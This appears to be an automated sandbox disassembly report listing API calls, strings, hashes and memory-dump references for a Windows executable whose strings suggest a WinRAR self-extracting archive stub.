• Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
• Instruction Fuzzy Hash: 5DE1C472D087828AE710DF66D4803AD7BA6FBA5758F144135EAAD877D6EF38E481C700
APIs
Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocClearStringVariant
                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                        • API String ID: 1959693985-3505469590
                                                                                        • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                        • Instruction ID: b1c1c8b0d54d2993566e42d6e35a0b61ec1654a34b72e1b9d2caa48787dcc0a6
                                                                                        • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                        • Instruction Fuzzy Hash: DA712E76F14A1585EB20CF6AD8905ED7BB4FB98B98B045132EA5D83BA8EF3CD144C310
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B7371
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B737F
                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B73A9
                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B73EF
                                                                                        • GetProcAddress.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B73FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 2559590344-2084034818
                                                                                        • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                        • Instruction ID: 8b9cd580db1ca52638a5f1fec28390caf8ee5d3944bc722543a81112843320ac
                                                                                        • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                        • Instruction Fuzzy Hash: B6318E21F1B64281EB11EB17A8005B92A95FFA4BA0F194635ED2DCA7E0EF3CE4598710
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,00007FF6FE1B1573,?,?,?,00007FF6FE1B192A), ref: 00007FF6FE1B162B
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6FE1B1573,?,?,?,00007FF6FE1B192A), ref: 00007FF6FE1B1648
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6FE1B1573,?,?,?,00007FF6FE1B192A), ref: 00007FF6FE1B1664
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                        • API String ID: 667068680-1718035505
                                                                                        • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                        • Instruction ID: 7f6f371c4dbbd964aec900ee623640618cf29ded79570e55436c3157d5cad7a1
                                                                                        • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                        • Instruction Fuzzy Hash: 75113020F19B4285FF64CB07A9401B41AA96FE8798F4E4436F83DC67D5FE7CB4548600
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1951A4: GetVersionExW.KERNEL32 ref: 00007FF6FE1951D5
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19ED8C
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19ED98
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19EDA8
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19EDB6
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19EDC4
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19EE05
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                        • Instruction ID: 7980982263efd5d82b12a5cca5fc4429067e0c036ff572660a1ce6d1d7cd0cf5
                                                                                        • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                        • Instruction Fuzzy Hash: C0517FB2F106518AEB14CFB9D8841AC7BB1F798788B604036EE1D97B98EF38E555C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                        • Instruction ID: 3672ad94516d0cc5f012fe0ec4d2ff7b18a179491d141bfea815766c48b96027
                                                                                        • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                        • Instruction Fuzzy Hash: C7314966F10A519AEB00CFB5D8801AC3771FB58758B54503AEE1ED3A98EF38D895C300
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: .rar$exe$rar$sfx
                                                                                        • API String ID: 3668304517-630704357
                                                                                        • Opcode ID: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
                                                                                        • Instruction ID: a9e3e80804151c7f3677e6e4d6250490890462aae60dea1a2602ce4fed3c5bf1
                                                                                        • Opcode Fuzzy Hash: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
                                                                                        • Instruction Fuzzy Hash: 77A17F22E1960640EB04DB26D4952BC2B61BFE5BE8F541235E93E876E9EF3CE549C340
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: abort$CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 2889003569-2084237596
                                                                                        • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                        • Instruction ID: 5c6ef4bf6780479396ef95fa6771e97c48217f10e0b15b35127a61e37c102ec2
                                                                                        • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                        • Instruction Fuzzy Hash: 1B919F73E08B818AE711CB66E4802ADBBA1F794788F144129FF5D97B95EF38D195CB00
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                        • String ID: csm$f
                                                                                        • API String ID: 2395640692-629598281
                                                                                        • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                        • Instruction ID: d1579c9f88df29eb2fe5fdd1d473adb56aef35e9b1afe24bfd2cb09d59aa12af
                                                                                        • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                        • Instruction Fuzzy Hash: 1B51A332F1960286DB54CF17E444A6D3B66FBA4B88F518134FA2A877C9EF78E8418740
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                        • API String ID: 2102711378-639343689
                                                                                        • Opcode ID: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
                                                                                        • Instruction ID: 6b3c3e86871ccd3fe0c95bf182eac67785b84c4d65a04bce01e548a83b348c23
                                                                                        • Opcode Fuzzy Hash: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
                                                                                        • Instruction Fuzzy Hash: 4651C362F1874685FB10DB66D8412BD2B61AFE57A4F000535FE2D97AD6FE3CA989C200
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Rect
                                                                                        • String ID: RarHtmlClassName
                                                                                        • API String ID: 2396740005-1658105358
                                                                                        • Opcode ID: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
                                                                                        • Instruction ID: e77a3f81afaf55551dc88cfe03b287f7b9c57c5896afc765efbd4ee3e0f42b96
                                                                                        • Opcode Fuzzy Hash: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
                                                                                        • Instruction Fuzzy Hash: 75517322E09B4286EB24DF27E45437A6B61FBE5B80F404435FA5E87B95EF3CE5498700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID: sfxcmd$sfxpar
                                                                                        • API String ID: 3540648995-3493335439
                                                                                        • Opcode ID: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
                                                                                        • Instruction ID: 9775a8374be28d52ade21f6d275c0b587e12a78b82a6dff515f1f4d25581e1a5
                                                                                        • Opcode Fuzzy Hash: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
                                                                                        • Instruction Fuzzy Hash: 83316F32F14A0584EB01DB6AE4841BC2771FBE8B98F140231EE6D977E9EE38E045C344
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                        • API String ID: 0-56093855
                                                                                        • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                        • Instruction ID: 59fe77b2c3f80574b156fdb07d595aa7717d691807250185b9b5282ff6b33e81
                                                                                        • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                        • Instruction Fuzzy Hash: A121C721D49E4780FB11CB1AF8441B56BA1BBE9B84F540536F96DC7AA0EE7CE598C340
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                        • Instruction ID: c294e7460a81135d88cb1f8ed47aecf03f74b10179ccb13ec7c3d4eb2a6c8700
                                                                                        • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                        • Instruction Fuzzy Hash: 1FF04F65F19A8281EF44CB16E4902B96BA0AFD8B90F441035F96FC67A4EE3CE485C701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                        • Instruction ID: a6c0e886ad960f00975ef6fdcc5f295759abff38f9d90d640d9d8c3e5e293f76
                                                                                        • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                        • Instruction Fuzzy Hash: 3581AD22F1C65285F710DB6A98406FD2EA4BBE5B88F044135ED2ED3AD5EF3CA4A1C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2398171386-0
                                                                                        • Opcode ID: 82f053c75c0f85402010483eccdcf8e864613be84fe09434e6a81e38387e2611
                                                                                        • Instruction ID: 0726182a5c21a7d772d3e61e39df9c0ca52ac2f1d1b5a33d633d3f3430df804f
                                                                                        • Opcode Fuzzy Hash: 82f053c75c0f85402010483eccdcf8e864613be84fe09434e6a81e38387e2611
                                                                                        • Instruction Fuzzy Hash: D4519262F14A4259FB50CB66E8442BD6BB1BBE87A8F404635EE2DC77D8EE389455C300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 3659116390-0
                                                                                        • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                        • Instruction ID: 46d92527c869bb15e92cd3b16aa59d6cc49e66b5fdaa366e8f3f9282b9a6f7ba
                                                                                        • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
